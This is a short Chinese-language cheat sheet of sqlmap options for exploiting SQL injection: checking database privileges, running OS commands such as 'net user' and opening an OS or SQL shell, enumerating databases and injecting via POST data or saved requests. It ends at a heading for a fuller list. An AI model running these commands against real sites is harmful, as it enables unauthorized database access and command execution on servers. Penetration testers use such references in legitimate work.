注入神器sqlmap:
Sqlmap参数:
1)测试注入点权限
sqlmap -u [url] --privileges //测试所有用户的权限
sqlmap -u [url] --privileges -U sa //测试用户sa的权限
2)执行shell命令
sqlmap -u [url] --os-cmd="net user" //执行net user命令
sqlmap -u [url] --os-shell //系统交互的shell
3)获取当前数据库名称
sqlmap -u [url] --current-db
4)执行SQL命令
sqlmap -u [url] --sql-shell //返回sql交互的shell,可以执行sql语句
5)POST提交方式
sqlmap -u [url] --data "POST参数"
6)显示详细的等级
sqlmap -u [url] --dbs -v 1
{
0:只显示Python的回溯信息、错误信息[ERROR]和关键信息[CRITICAL];
1:显示普通信息[INFO]和警告信息[WARNING];
2:显示调试信息[DEBUG];
3:显示注入使用的攻击荷载;
4:显示HTTP请求;
5:显示HTTP响应头;
6:显示HTTP响应内容。
}
7)注入http请求
sqlmap -r head.txt --dbs //head.txt内容为http请求
8)直接连接到数据库
sqlmap -d "mysql://[email protected]:3306/testdb" --dbs
9)注入等级
sqlmap -u [url] --level 3
10)将注入语句插入到指定位置(使用*将sql语句指定插入到指定位置)
sqlmap -u “http://www.xxser.com/id/2*html” --dbs
完整版Sqlmap命令参数:
